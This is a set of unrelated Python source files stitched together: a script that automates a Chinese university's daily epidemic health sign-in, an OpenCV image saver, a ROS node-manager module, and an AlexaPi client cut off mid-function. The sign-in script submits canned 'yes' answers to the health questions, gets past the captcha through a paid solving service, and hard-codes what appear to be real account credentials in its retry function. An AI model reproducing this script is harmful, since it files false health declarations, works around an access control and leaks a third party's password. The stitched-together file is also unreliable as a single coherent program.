# Once you use or copy any script related to this project (yibanAutocheakin), you are deemed to have accepted this disclaimer.
# Requirements: Python 3.6.4 and the requests library
# Usage: once everything is filled in correctly, run the .py file from a server shell script, a Windows scheduled task, or by hand each day
# Starting at 00:00 is recommended
# Function: automatic Yiban check-in; the interval between sign-ins is controlled by jiange()
# !!! NOTE !!!
# Every comment in this code matters; follow them and it will work (as of January 11, 2022)
# !!! NOTE !!!
import requests # requests must be installed separately (e.g. pip install requests)
import os
import json
import time
from threading import Thread
def jiange(): # "jiange" = interval between sign-ins
time.sleep(10800) # seconds to wait before signing in again after a success
class KSClient(object):
# The developer found that sign-in needs a captcha that ordinary image processing can rarely read correctly;
# even a convolutional network trained on 100k captcha images had limited success,
# so a recognition platform is used instead. It offers 20 free recognitions per day, plenty for personal use.
# Platform: http://fast.net885.com/ - register via the link at the bottom left, then fill in the username and password everywhere below; the platform is cheap.
# !!! There is one more username/password pair in the main sign-in function - do not forget to fill it in !!!
# !!!!!!!!! This is not an advertisement for the recognition platform !!!!!!!!!
def __init__(self):
self.username = 'username' # put your platform username between the quotes
self.Token = '' # leave this alone
self.headers = {
'Connection': 'Keep-Alive',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
}
# fetch the access token
def GetTaken(self, username, password): # fill in (self, username, password) in order
brtn = False
r = requests.get('http://api.95man.com:8888/api/Http/UserTaken?user=' + username + '&pwd=' + password + '&isref=0',
headers=self.headers) # username after the first '+', password after the third '+'
arrstr = r.text.split('|')
if (arrstr[0] == '1'):
self.username = username # your platform username
self.Token = arrstr[1]
brtn = True
return brtn
# recognize an image
def PostPic(self, filepath, codetype):
"""
imbyte: 图片字节
imgtype: 类型 1为通用类型 更多精准类型请参考 http://fast.net885.com/auth/main.html
"""
strRtn = ''
imbyte = open(filepath, 'rb').read()
filename = os.path.basename(filepath)
files = {'imgfile': (filename, imbyte)}
r = requests.post(
'http://api.95man.com:8888/api/Http/Recog?Taken=' + self.Token + '&imgtype=' + str(codetype) + '&len=0',
files=files, headers=self.headers)
arrstr = r.text.split('|')
# response format: recognition ID | recognition result | account balance
if (int(arrstr[0]) > 0):
strRtn = arrstr[1]
return strRtn
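# Usage sketch: client = KSClient(); if client.GetTaken(user, pwd) succeeds,
# client.PostPic('captcha.png', 1) returns the recognized captcha text
# (type 1 is the platform's generic image type).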
def qiandao(hbnd, hbndt): # "qiandao" = main sign-in function
global wdnmd
s = requests.Session()
Ks95man = KSClient()
code = None
web = "http://211.68.191.30/epidemic/index?token=%s" % (hbnd)
r = s.get(web)
r = s.get("http://211.68.191.30/epidemic/captcha")
with open("1.png", "wb+") as f:
f.write(r.content)
f.close()
if Ks95man.GetTaken('username', 'password'): # fill in (username, password) for the captcha platform
code = Ks95man.PostPic('1.png', 1)
sign_content = hbndt
dat = {"data": sign_content, "captcha": code}
r = s.post("http://211.68.191.30/epidemic/student/sign", data=dat)
text = json.loads(r.text)
print(text)
try:
nmd = text["code"]
except:
rnm = text["status"]
if (rnm) == 500:
cnm = 0
while (cnm) < 10:
print(cnm)
chongshi(hbnd, hbndt)
if (wdnmd) == 1:
jiange()
qiandao(hbnd, hbndt)
else:
cnm = cnm + 1
time.sleep(5)
else:
print("签到失败")
tongzhi("签到失败") # 调用通知函数,并发送()中的内容
else:
print(nmd)
if (nmd) == -1:
time.sleep(1)
qiandao(hbnd, hbndt)
else:
jiange()
qiandao(hbnd, hbndt)
def chongshi(hbnd, hbndt): # "chongshi" = retry-on-failure function
global wdnmd
s = requests.Session()
Ks95man = KSClient()
code = None
web = "http://211.68.191.30/epidemic/index?token=%s" % (hbnd)
r = s.get(web)
r = s.get("http://211.68.191.30/epidemic/captcha")
with open("1.png", "wb+") as f:
f.write(r.content)
f.close()
if Ks95man.GetTaken('zwxym', 'zhao0427'):
code = Ks95man.PostPic('1.png', 1)
sign_content = hbndt
dat = {"data": sign_content, "captcha": code}
r = s.post("http://211.68.191.30/epidemic/student/sign", data=dat)
text = json.loads(r.text)
try:
nmd = text["code"]
except:
wdnmd = 0
else:
wdnmd = 1
def tongzhi(text): # "tongzhi" = notification function
key = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" # search for "Server酱" (ServerChan), log in with a WeChat QR code, get a key and paste it here
url = "https://sctapi.ftqq.com/%s.send" % (key)
title = u"Notification" # notification title, customizable
content = text # the content is whatever tongzhi() is called with; edit the tongzhi() argument in qiandao() (around line 130) to change it
data = {"text": title, "desp": content}
requests.post(url, data)
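# ServerChan (Server酱) relays the title/content pair to the WeChat account
# identified by the key in the URL, so a failed sign-in reaches your phone.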
def main():
global nmd
global code
global rnm
global cnm
global wdnmd
global hbnd
global hbndt
global xxx # you can rename this variable
xxx = "" # your token goes here
# How to get it:
# This is your sign-in token. Open the "Yiban service hall", tap the three dots in the top-right corner,
# copy the link, send it to a PC and open it in Chrome.
# Right-click the page, choose Inspect, open the "Network" tab in the panel, then click "epidemic prevention sign-in" on the page.
# Several URLs will appear; the first one contains the token. Copy that link and keep only what follows "token=",
# then paste it between the quotes above to finish the token setup.
# !!! NOTE !!!
# The token is not permanent; it is reset from time to time, and this program cannot follow the reset automatically.
# So whenever a ServerChan notification arrives, first check whether the token has changed.
# To check: log in to the account and see whether entering the service hall asks you to re-authorize; if it does, repeat the steps above to fetch a new token.
# If you have some packet-capture experience, please send a capture of the authorization flow to learnzhao@yzui.onmicrosoft.com to help the developer obtain the third-party verify_request.
# If you don't, please tap "copy link" in the top-right corner of the authorization page and send the link to the same address.
# Thanks for everyone's support!
xxxt = '''{
"realName":"your name - e.g. 'Da Mengzi'",
"collegeName":"full name of your college - e.g. 'College of Urban and Rural Construction'",
"className":"full major name and class number - e.g. 'Civil Engineering 1701'",
"studentId":"your student ID",
"answer":
"{
\\"q1\\":\\"是\\",
\\"q2\\":\\"是\\",
\\"q3\\":\\"是\\",
\\"q4\\":\\"是\\",
\\"q4_1\\":\\"\\",
\\"q5\\":\\"是\\",
\\"q6\\":\\"是\\",
\\"q6_1\\":\\"\\",
\\"position\\":\\"your address\\"
}"
}'''
# !!! NOTE !!!
# The four items above must be filled in with the signer's real information, between the quotes, replacing the examples.
# The answer block keeps working as long as the sign-in form does not change ("是" means "yes" and must stay as-is);
# the only part to edit is the address at the end - replace "your address" with where you live.
# If the form changes, repeat the token trick: copy the service-hall URL, open the epidemic sign-in page, press the sign-in
# button, then right-click and Inspect to see whether any "q" (question) fields changed, and add or edit answer entries to match.
# Usually a new question is added; insert it above the position line following the existing pattern.
# The developer promises this open-source code contains no backdoor collecting anyone's personal information.
# -------------------------------------------------------------------------------------------------------------------
# !!! NOTE !!!
# This program uses "highly advanced" multithreading and can run several tasks in parallel; add people as follows.
# Put the second person's token into "yyy" below:
# global yyy
# yyy = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
# Put the second person's info and address into "yyyt" (address last); the third person follows the same pattern. Remember to declare the global first - global yyy
# global yyyt
# yyyt = '''{"realName":"xx","collegeName":"xxxxxx","className":"xxxxxxxxx","studentId":"xxxxxxxxxxxxx","answer":"{\\"q1\\":\\"是\\",\\"q2\\":\\"是\\",\\"q3\\":\\"是\\",\\"q4\\":\\"是\\",\\"q4_1\\":\\"\\",\\"q5\\":\\"是\\",\\"q6\\":\\"是\\",\\"q6_1\\":\\"\\",\\"position\\":\\"xxxxxxxxxx\\"}"}'''
# global zzz
# zzz = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
# global zzzt
# zzzt = '''{"realName":"xx","collegeName":"xxxxxxx","className":"xxxxxxxxx","studentId":"xxxxxxxxxxxxx","answer":"{\\"q1\\":\\"是\\",\\"q2\\":\\"是\\",\\"q3\\":\\"是\\",\\"q4\\":\\"是\\",\\"q4_1\\":\\"\\",\\"q5\\":\\"是\\",\\"q6\\":\\"是\\",\\"q6_1\\":\\"\\",\\"position\\":\\"xxxxxxxxx\\"}"}'''
# ......
t1 = Thread(target=qiandao, args=(xxx, xxxt,)) # thread t1 calls qiandao() with xxx/xxxt to sign in the first person
# t2 = Thread(target=qiandao, args=(yyy,yyyt,)) # thread t2 would sign in the second person
# t3 = Thread(target=qiandao, args=(zzz,zzzt,)) # thread t3 would sign in the third person
# ......
t1.start() # start t1; start only the threads for the people you want signed in
# t2.start()
# t3.start()
# ......
if __name__ == "__main__": # entry point
main()
|
AsyncSave.py
|
import datetime
import threading
import time
import os
import cv2
def TimeStamp(mode='msec'):
ts = time.time()
if mode == 'msec-raw':
return str(int(time.time()*1000))
if mode == 'msec':
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d.%H-%M-%S.%f')
if mode == 'minute':
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d.%H-%M')
if mode == 'hour':
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d.%H')
if mode == 'day':
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')
def mkdirMaybe(recordDir):
if not os.path.exists(recordDir):
os.makedirs(recordDir)
print('New directory: %40s' % recordDir)
class AsyncSaver(threading.Thread):
def __init__(self, camID, rootPath):
threading.Thread.__init__(self) # required when subclassing Thread
self.camID = camID
self.recordDir = os.path.join(rootPath, 'camdir-%d' % camID)
mkdirMaybe(self.recordDir)
def save(self, bgrImg, bb=None):
currTS = TimeStamp(mode='msec-raw')
if bb is None:
filename = currTS + '.jpg'
else:
filename = '%s-%d-%d-%d-%d.jpg' % (currTS, bb.left(), bb.top(), bb.right(), bb.bottom())
dayDir = os.path.join(self.recordDir, TimeStamp(mode='day'))
hourDir = os.path.join(dayDir, TimeStamp(mode='hour'))
minuteDir = os.path.join(hourDir, TimeStamp(mode='minute'))
mkdirMaybe(minuteDir)
path = os.path.join(minuteDir, filename)
threading.Thread(target=cv2.imwrite, args=(path, bgrImg)).start()
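# Usage sketch (hypothetical camID/rootPath): saver = AsyncSaver(0, '/tmp/rec');
# then saver.save(frame) inside a capture loop. Each call spawns a short-lived
# writer thread, so the capture loop never blocks on disk I/O, at the cost of
# one thread per saved frame.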
|
__init__.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, absolute_import, print_function, unicode_literals
import argparse
import os
import roslib.network
import rospy
import socket
import sys
import threading
from fkie_master_discovery.common import get_hostname
from fkie_node_manager_daemon import host as nmdhost
from fkie_node_manager_daemon.version import detect_version
from .common import get_ros_home
from .history import History
from .name_resolution import NameResolution
from fkie_node_manager.nmd_client import NmdClient
from fkie_node_manager.nmd_client.launch_channel import BinarySelectionRequest, LaunchArgsSelectionRequest
from .progress_queue import InteractionNeededError
from .screen_handler import ScreenHandler, ScreenSelectionRequest, NoScreenOpenLogRequest
from .settings import Settings
from .ssh_handler import SSHhandler, AuthenticationRequest
from .start_handler import StartException
from .start_handler import StartHandler
PKG_NAME = 'fkie_node_manager'
__author__ = "Alexander Tiderko (Alexander.Tiderko@fkie.fraunhofer.de)"
__copyright__ = "Copyright (c) 2012 Alexander Tiderko, Fraunhofer FKIE/CMS"
__license__ = "BSD"
__version__ = "unknown" # git describe --tags --dirty --always
__date__ = "unknown" # git log -1 --date=iso
# PYTHONVER = (2, 7, 1)
# if sys.version_info < PYTHONVER:
# print 'For full scope of operation this application requires python version > %s, current: %s' % (str(PYTHONVER), sys.version_info)
HOSTS_CACHE = dict()
'''
the cache dictionary that stores the results of local-host tests.
:see: :meth:`is_local`
'''
_LOCK = threading.RLock()
_MAIN_FORM = None
_SETTINGS = None
_NMD_CLIENT = None
_SSH_HANDLER = None
_SCREEN_HANDLER = None
_START_HANDLER = None
_NAME_RESOLUTION = None
_HISTORY = None
_QAPP = None
def settings():
'''
:return: The global settings
:rtype: :class:`fkie_node_manager.settings.Settings`
'''
return _SETTINGS
def nmd():
'''
:return: Node manager daemon client
:rtype: :class:`fkie_node_manager.nmd_client.NmdClient`
'''
return _NMD_CLIENT
def ssh():
'''
:return: The SSH handler to handle the SSH connections
:rtype: :class:`fkie_node_manager.ssh_handler.SSHhandler`
'''
return _SSH_HANDLER
def screen():
'''
:return: The screen handler to the screens.
:rtype: :class:`fkie_node_manager.screen_handler.ScreenHandler`
:see: http://linuxwiki.de/screen
'''
return _SCREEN_HANDLER
def starter():
'''
:return: The start handler to handle the start of new ROS nodes on local or remote machines.
:rtype: :class:`fkie_node_manager.start_handler.StartHandler`
'''
return _START_HANDLER
def nameres():
'''
:return: The name resolution object that translates a name to the host or ROS master URI.
:rtype: :class:`fkie_node_manager.name_resolution.NameResolution`
'''
return _NAME_RESOLUTION
def history():
'''
:return: The history of entered parameter.
:rtype: :class:`fkie_node_manager.history.History`
'''
return _HISTORY
def is_local(hostname, wait=False):
'''
Test whether the given host name is the name of the local host or not.
:param str hostname: the name or IP of the host
:return: True if the hostname is local or None was given
:rtype: bool
:raise Exception: on errors while resolving host
'''
if hostname is None:
return True
with _LOCK:
if hostname in HOSTS_CACHE:
if isinstance(HOSTS_CACHE[hostname], threading.Thread):
return False
return HOSTS_CACHE[hostname]
try:
socket.inet_aton(hostname)
local_addresses = ['localhost'] + roslib.network.get_local_addresses()
# check 127/8 and local addresses
result = hostname.startswith('127.') or hostname in local_addresses
with _LOCK:
HOSTS_CACHE[hostname] = result
return result
except socket.error:
# the hostname must be resolved => do it in a thread
if wait:
result = __is_local(hostname)
return result
else:
thread = threading.Thread(target=__is_local, args=(hostname,))
thread.daemon = True
with _LOCK:
HOSTS_CACHE[hostname] = thread
thread.start()
return False
def __is_local(hostname):
'''
Test the hostname whether it is local or not. Uses socket.gethostbyname().
'''
try:
machine_addr = socket.gethostbyname(hostname)
except socket.gaierror:
with _LOCK:
HOSTS_CACHE[hostname] = False
return False
local_addresses = ['localhost'] + roslib.network.get_local_addresses()
# check 127/8 and local addresses
result = machine_addr.startswith('127.') or machine_addr in local_addresses
with _LOCK:
HOSTS_CACHE[hostname] = result
return result
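# While a resolver thread is still running, HOSTS_CACHE maps the hostname to
# the Thread object itself; is_local() treats that transient state as "not
# local" until __is_local() replaces it with the real boolean.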
def finish(*arg):
'''
Callback called on exit of the ros node.
'''
# close all ssh sessions
if _SSH_HANDLER is not None:
_SSH_HANDLER.close()
# save the launch history
if _HISTORY is not None:
try:
_HISTORY.storeAll()
except Exception as err:
sys.stderr.write("Error while store history: %s" % err)
from fkie_node_manager.main_window import MainWindow
# stop all threads in the main window
if isinstance(_MAIN_FORM, MainWindow):
if not hasattr(_MAIN_FORM, "on_finish"):
_MAIN_FORM.close_without_ask = True
_MAIN_FORM.close_signal.emit()
def set_terminal_name(name):
'''
Change the terminal name.
:param str name: New name of the terminal
'''
sys.stdout.write("\x1b]2;%s\x07" % name)
def set_process_name(name):
'''
Change the process name.
:param str name: name new process name
'''
try:
from ctypes import cdll, byref, create_string_buffer
libc = cdll.LoadLibrary('libc.so.6')
buff = create_string_buffer(len(name) + 1)
buff.value = name
libc.prctl(15, byref(buff), 0, 0, 0)
except Exception:
try:
import setproctitle
setproctitle.setproctitle(name)
except Exception:
pass
def init_settings():
global _SETTINGS
_SETTINGS = Settings()
def init_globals(masteruri):
'''
:return: True if the masteruri referred to localhost
:rtype: bool
'''
# initialize the global handler
global _NMD_CLIENT
global _SSH_HANDLER
global _SCREEN_HANDLER
global _START_HANDLER
global _NAME_RESOLUTION
global _HISTORY
_NMD_CLIENT = NmdClient()
# _NMD_CLIENT.start()
_SSH_HANDLER = SSHhandler()
_SCREEN_HANDLER = ScreenHandler()
_START_HANDLER = StartHandler()
_NAME_RESOLUTION = NameResolution()
_HISTORY = History()
# test where the roscore is running (local or remote)
__is_local('localhost') # fill cache
return __is_local(get_hostname(masteruri)) # fill cache
def init_arg_parser():
global __version__
parser = argparse.ArgumentParser()
parser.add_argument("--version", action="version", version="%s %s" % ("%(prog)s", __version__))
parser.add_argument("-f", "--file", nargs=1, help="loads the given file as default on start")
parser.add_argument("-m", "--muri", nargs=1, default='', help="starts ROS master with given URI, usefull on hosts "
"with multiple interfaces. ROS_HOSTNAME will be set "
"to the host of this URI, but only if it is not an IP.")
parser.add_argument("-p", "--port", nargs='?', default=22622, type=int, help="port for local monitoring (default: 22622)")
group = parser.add_argument_group('echo')
group.add_argument("--echo", nargs=2, help="starts an echo dialog instead of node manager", metavar=('name', 'type'))
group.add_argument("--hz", action="store_true", help="shows only the Hz value instead of topic content in echo dialog")
group.add_argument("--ssh", action="store_true", help="connects via SSH")
return parser
def init_echo_dialog(prog_name, masteruri, topic_name, topic_type, hz=False, use_ssh=False):
'''
Initialize the environment to start an echo window.
'''
# start ROS-Master, if not currently running
# StartHandler._prepareROSMaster(masteruri)
name = '%s_echo' % prog_name
rospy.init_node(name, anonymous=True, log_level=rospy.INFO)
set_terminal_name(name)
set_process_name(name)
from fkie_node_manager.echo_dialog import EchoDialog
global _SSH_HANDLER
_SSH_HANDLER = SSHhandler()
return EchoDialog(topic_name, topic_type, hz, masteruri, use_ssh=use_ssh)
def init_main_window(prog_name, masteruri, launch_files=[], port=22622):
'''
Initialize the environment to start Node Manager.
'''
# start ROS-Master, if not currently running
StartHandler._prepareROSMaster(masteruri)
# setup the loglevel
log_level = rospy.DEBUG
try:
log_level = getattr(rospy, rospy.get_param('/%s/log_level' % prog_name, "INFO"))
except Exception as err:
print("Error while set the log level: %s\n->INFO level will be used!" % err)
rospy.init_node(prog_name, anonymous=False, log_level=log_level)
set_terminal_name(prog_name)
set_process_name(prog_name)
from fkie_node_manager.main_window import MainWindow
local_master = init_globals(masteruri)
return MainWindow(launch_files, not local_master, port)
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%% MAIN %%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def main(name):
'''
Start the NodeManager or EchoDialog.
:param str name: the name propagated to the :meth:`rospy.init_node`
'''
try:
from python_qt_binding.QtGui import QApplication
except Exception:
try:
from python_qt_binding.QtWidgets import QApplication
except Exception:
sys.stderr.write("please install 'python_qt_binding' package!!")
sys.exit(-1)
init_settings()
global __version__
global __date__
__version__, __date__ = detect_version(PKG_NAME)
parser = init_arg_parser()
args = rospy.myargv(argv=sys.argv)
parsed_args = parser.parse_args(args[1:])
if parsed_args.muri:
masteruri = parsed_args.muri[0]
hostname = nmdhost.get_ros_hostname(masteruri)
os.environ['ROS_MASTER_URI'] = masteruri
if hostname:
os.environ['ROS_HOSTNAME'] = hostname
masteruri = settings().masteruri()
# Initialize Qt
global _QAPP
_QAPP = QApplication(sys.argv)
# decide to show main or echo dialog
global _MAIN_FORM
try:
if parsed_args.echo:
_MAIN_FORM = init_echo_dialog(name, masteruri, parsed_args.echo[0],
parsed_args.echo[1], parsed_args.hz,
parsed_args.ssh)
else:
_MAIN_FORM = init_main_window(name, masteruri, parsed_args.file, parsed_args.port)
except Exception as err:
import traceback
print(traceback.format_exc())
sys.exit("%s" % err)
exit_code = 0
# resize and show the qt window
if not rospy.is_shutdown():
# change path for access to the images of descriptions
os.chdir(settings().PACKAGE_DIR)
# _MAIN_FORM.resize(1024, 720)
screen_size = QApplication.desktop().availableGeometry()
if (_MAIN_FORM.size().width() >= screen_size.width() or
_MAIN_FORM.size().height() >= screen_size.height() - 24):
_MAIN_FORM.showMaximized()
else:
_MAIN_FORM.show()
exit_code = -1
try:
rospy.on_shutdown(finish)
exit_code = _QAPP.exec_()
if nmd() is not None:
nmd().stop()
except Exception:
if not rospy.is_shutdown():
import traceback
print(traceback.format_exc())
return exit_code
|
main.py
|
#! /usr/bin/env python
import importlib
import os
import logging
import tempfile
import signal
import shutil
import time
import sys
import threading
import json
import optparse
import email
import subprocess
import hashlib
import yaml
import requests
import coloredlogs
import alexapi.config
import alexapi.tunein as tunein
import alexapi.capture
import alexapi.triggers as triggers
from alexapi.exceptions import ConfigurationException
from alexapi.constants import RequestType, PlayerActivity
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s')
coloredlogs.DEFAULT_FIELD_STYLES = {
'hostname': {'color': 'magenta'},
'programname': {'color': 'cyan'},
'name': {'color': 'blue'},
'levelname': {'color': 'magenta', 'bold': True},
'asctime': {'color': 'green'}
}
coloredlogs.DEFAULT_LEVEL_STYLES = {
'info': {'color': 'blue'},
'critical': {'color': 'red', 'bold': True},
'error': {'color': 'red'},
'debug': {'color': 'green'},
'warning': {'color': 'yellow'}
}
# Get arguments
parser = optparse.OptionParser()
parser.add_option('-s', '--silent',
dest="silent",
action="store_true",
default=False,
help="start without saying hello")
parser.add_option('-d', '--debug',
dest="debug",
action="store_true",
default=False,
help="display debug messages")
parser.add_option('--daemon',
dest="daemon",
action="store_true",
default=False,
help="Used by initd/systemd start script to reconfigure logging")
cmdopts, cmdargs = parser.parse_args()
silent = cmdopts.silent
debug = cmdopts.debug
config_exists = alexapi.config.filename is not None
if config_exists:
with open(alexapi.config.filename, 'r') as stream:
config = yaml.load(stream, Loader=yaml.SafeLoader) # explicit loader; bare yaml.load is deprecated and unsafe
if debug:
log_level = logging.DEBUG
else:
if config_exists:
log_level = logging.getLevelName(config.get('logging', 'INFO').upper())
else:
log_level = logging.getLevelName('INFO')
if cmdopts.daemon:
coloredlogs.DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
else:
coloredlogs.DEFAULT_LOG_FORMAT = '%(asctime)s %(levelname)s: %(message)s'
coloredlogs.install(level=log_level)
alexa_logger = logging.getLogger('alexapi')
alexa_logger.setLevel(log_level)
logger = logging.getLogger(__name__)
if not config_exists:
logger.critical('Can not find configuration file. Exiting...')
sys.exit(1)
# Setup event commands
event_commands = {
'startup': "",
'pre_interaction': "",
'post_interaction': "",
'shutdown': "",
}
if 'event_commands' in config:
event_commands.update(config['event_commands'])
im = importlib.import_module('alexapi.device_platforms.' + config['platform']['device'] + 'platform', package=None)
cl = getattr(im, config['platform']['device'].capitalize() + 'Platform')
platform = cl(config)
class Player:
config = None
platform = None
pHandler = None
tunein_parser = None
navigation_token = None
playlist_last_item = None
progressReportRequired = []
def __init__(self, config, platform, pHandler): # pylint: disable=redefined-outer-name
self.config = config
self.platform = platform
self.pHandler = pHandler # pylint: disable=invalid-name
self.tunein_parser = tunein.TuneIn(5000)
def play_playlist(self, payload):
self.navigation_token = payload['navigationToken']
self.playlist_last_item = payload['audioItem']['streams'][-1]['streamId']
for stream in payload['audioItem']['streams']: # pylint: disable=redefined-outer-name
streamId = stream['streamId']
if stream['progressReportRequired']:
self.progressReportRequired.append(streamId)
url = stream['streamUrl']
if stream['streamUrl'].startswith("cid:"):
url = "file://" + tmp_path + hashlib.md5(stream['streamUrl'].replace("cid:", "", 1).encode()).hexdigest() + ".mp3"
if (url.find('radiotime.com') != -1):
url = self.tunein_playlist(url)
self.pHandler.queued_play(url, stream['offsetInMilliseconds'], audio_type='media', stream_id=streamId)
def play_speech(self, mrl):
self.stop()
self.pHandler.blocking_play(mrl)
def stop(self):
self.pHandler.stop()
def is_playing(self):
return self.pHandler.is_playing()
def get_volume(self):
return self.pHandler.volume
def set_volume(self, volume):
self.pHandler.set_volume(volume)
def playback_callback(self, requestType, playerActivity, streamId):
if (requestType == RequestType.STARTED) and (playerActivity == PlayerActivity.PLAYING):
self.platform.indicate_playback()
elif (requestType in [RequestType.INTERRUPTED, RequestType.FINISHED, RequestType.ERROR]) and (playerActivity == PlayerActivity.IDLE):
self.platform.indicate_playback(False)
if streamId:
if streamId in self.progressReportRequired:
self.progressReportRequired.remove(streamId)
gThread = threading.Thread(target=alexa_playback_progress_report_request, args=(requestType, playerActivity, streamId))
gThread.start()
if (requestType == RequestType.FINISHED) and (playerActivity == PlayerActivity.IDLE) and (self.playlist_last_item == streamId):
gThread = threading.Thread(target=alexa_getnextitem, args=(self.navigation_token,))
self.navigation_token = None
gThread.start()
def tunein_playlist(self, url):
logger.debug("TUNE IN URL = %s", url)
req = requests.get(url)
lines = req.content.decode().split('\n')
nurl = self.tunein_parser.parse_stream_url(lines[0])
if nurl:
return nurl[0]
return ""
# Playback handler
def playback_callback(requestType, playerActivity, streamId):
return player.playback_callback(requestType, playerActivity, streamId)
im = importlib.import_module('alexapi.playback_handlers.' + config['sound']['playback_handler'] + "handler", package=None)
cl = getattr(im, config['sound']['playback_handler'].capitalize() + 'Handler')
pHandler = cl(config, playback_callback)
player = Player(config, platform, pHandler)
path = os.path.dirname(os.path.realpath(__file__)) # dirname instead of rstrip: rstrip strips a character set, not a suffix
resources_path = os.path.join(path, 'resources', '')
tmp_path = os.path.join(tempfile.mkdtemp(prefix='AlexaPi-runtime-'), '')
MAX_VOLUME = 100
MIN_VOLUME = 30
def internet_on():
try:
requests.get('https://api.amazon.com/auth/o2/token')
logger.info("Connection OK")
return True
except requests.exceptions.RequestException:
logger.error("Connection Failed")
return False
class Token:
_token = ''
_timestamp = None
_validity = 3570
def __init__(self, aconfig):
self._aconfig = aconfig
if not self._aconfig.get('refresh_token'):
logger.critical("AVS refresh_token not found in the configuration file. "
"Run the setup again to fix your installation (see project wiki for installation instructions).")
raise ConfigurationException
self.renew()
def __str__(self):
if (not self._timestamp) or (time.time() - self._timestamp > self._validity):
logger.debug("AVS token: Expired")
self.renew()
return self._token
def renew(self):
logger.info("AVS token: Requesting a new one")
payload = {
"client_id": self._aconfig['Client_ID'],
"client_secret": self._aconfig['Client_Secret'],
"refresh_token": self._aconfig['refresh_token'],
"grant_type": "refresh_token"
}
url = "https://api.amazon.com/auth/o2/token"
try:
response = requests.post(url, data=payload)
resp = json.loads(response.text)
self._token = resp['access_token']
self._timestamp = time.time()
logger.info("AVS token: Obtained successfully")
except requests.exceptions.RequestException as exp:
logger.critical("AVS token: Failed to obtain a token: %s", str(exp))
# from https://github.com/respeaker/Alexa/blob/master/alexa.py
def alexa_speech_recognizer_generate_data(audio, boundary):
"""
Generate an iterator for a chunked transfer-encoding request to the Alexa Voice Service
Args:
audio: raw 16 bit LSB audio data
boundary: boundary of multipart content
Returns:
"""
logger.debug('Start sending speech to Alexa Voice Service')
chunk = '--%s\r\n' % boundary
chunk += (
'Content-Disposition: form-data; name="request"\r\n'
'Content-Type: application/json; charset=UTF-8\r\n\r\n'
)
data = {
"messageHeader": {
"deviceContext": [{
"name": "playbackState",
"namespace": "AudioPlayer",
"payload": {
"streamId": "",
"offsetInMilliseconds": "0",
"playerActivity": "IDLE"
}
}]
},
"messageBody": {
"profile": "alexa-close-talk",
"locale": "en-us",
"format": "audio/L16; rate=16000; channels=1"
}
}
yield bytes(chunk + json.dumps(data) + '\r\n', 'utf8')
chunk = '--%s\r\n' % boundary
chunk += (
'Content-Disposition: form-data; name="audio"\r\n'
'Content-Type: audio/L16; rate=16000; channels=1\r\n\r\n'
)
yield bytes(chunk, 'utf8')
for audio_chunk in audio:
yield audio_chunk
yield bytes('--%s--\r\n' % boundary, 'utf8')
logger.debug('Finished sending speech to Alexa Voice Service')
platform.indicate_processing()
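# Because the body is a generator, requests sends it with chunked
# transfer-encoding: the microphone audio is streamed to AVS piece by piece
# instead of being buffered in memory first.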
def alexa_speech_recognizer(audio_stream):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/speechrecognizer-requests
url = 'https://access-alexa-na.amazon.com/v1/avs/speechrecognizer/recognize'
boundary = 'this-is-a-boundary'
headers = {
'Authorization': 'Bearer %s' % token,
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
'Transfer-Encoding': 'chunked',
}
data = alexa_speech_recognizer_generate_data(audio_stream, boundary)
resp = requests.post(url, headers=headers, data=data)
platform.indicate_processing(False)
process_response(resp)
def alexa_getnextitem(navigationToken):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-getnextitem-request
logger.debug("Sending GetNextItem Request...")
url = 'https://access-alexa-na.amazon.com/v1/avs/audioplayer/getNextItem'
headers = {
'Authorization': 'Bearer %s' % token,
'content-type': 'application/json; charset=UTF-8'
}
data = {
"messageHeader": {},
"messageBody": {
"navigationToken": navigationToken
}
}
response = requests.post(url, headers=headers, data=json.dumps(data))
process_response(response)
def alexa_playback_progress_report_request(requestType, playerActivity, stream_id):
